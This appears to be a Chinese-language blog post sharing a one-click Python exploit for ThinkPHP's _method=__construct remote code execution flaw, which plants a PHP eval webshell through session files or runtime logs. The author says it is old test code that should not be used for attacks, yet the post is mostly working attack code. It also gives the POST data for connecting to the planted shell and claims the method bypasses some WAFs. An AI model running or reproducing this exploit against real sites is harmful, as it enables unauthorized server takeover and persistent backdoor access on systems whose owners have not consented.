年前寫的了,做測試用,主要利用 session getshell 或者thinkphp 的log //勿用attack 測試
import requests
import time
import sys
def session_write(url):
fuck = {'_method': '__construct', 'filter[]': 'think\Session::set', 'method': 'get',
'get[]': "<?php @eval($_POST['x'])?>",'server[]':'1'}
res = requests.post(url,cookies={'PHPSESSID':'9enl96jhqjhvuj37t0m6aluule'},data=fuck,headers={'User-Agent':'Mozilla/5.0 (Macintosh; BaiduSpider)'})
fuckshell = {'_method': '__construct', 'filter[]': 'think\__include_file', 'method': 'get',
'server[REQUEST_METHOD]': '/tmp/sess_9enl96jhqjhvuj37t0m6aluule','x':'print(2020202020);'}
res = requests.post(url, cookies={'PHPSESSID': '9enl96jhqjhvuj37t0m6aluule'}, data=fuckshell,
headers={'User-Agent': 'Mozilla/5.0 (Macintosh; BaiduSpider)'})
return res.text
def log_shell(url):
day = '../data/runtime/log/'+time.strftime("%Y%m/%d.log", time.localtime())
print day
fuck = {'_method': '__construct', 'filter[]': 'call_user_func','method':'get','get[]': "<?php @eval($_POST['x'])?>",'server[]':'1'}
res = requests.post(url,cookies={'PHPSESSID':'9enl96jhqjhvuj37t0m6aluule'},data=fuck,headers={'User-Agent':'Mozilla/5.0 (Macintosh; BaiduSpider)'})
fuckshell = {'_method': '__construct', 'filter[]': 'think\__include_file', 'method': 'get',
'server[REQUEST_METHOD]':day,'x':'print(2020202020);'}
res = requests.post(url, cookies={'PHPSESSID': '9enl96jhqjhvuj37t0m6aluule'}, data=fuckshell,
headers={'User-Agent': 'Mozilla/5.0 (Macintosh; BaiduSpider)'})
return res.text
if sys.argv[1]:
url=sys.argv[1]+'index.php?s=captcha'
else:
exit("exp.py http://xxxx")
if '20202020' in session_write(url):
print "shell ok session shell"
elif '20202020' in log_shell(url):
print "shell ok log shell"
else:
print "bad"
use: 
直接放地址,一鍵即可.....
寫博客大部分是為了記錄個人筆記.
連接方法:
POST DATA
_method=__construct&filter[]=think\__include_file&method=get&server[REQUEST_METHOD]=/tmp/sess_9enl96jhqjhvuj37t0m6aluule
好處:Bypass 一些waf 可以換換一句話的payload
遇到根目錄不可寫的時候,做包含會比較方便一些.
session getshell 失敗 會嘗試使用 thinkphp log 的方式, 具體會回顯的,自行測試+修改.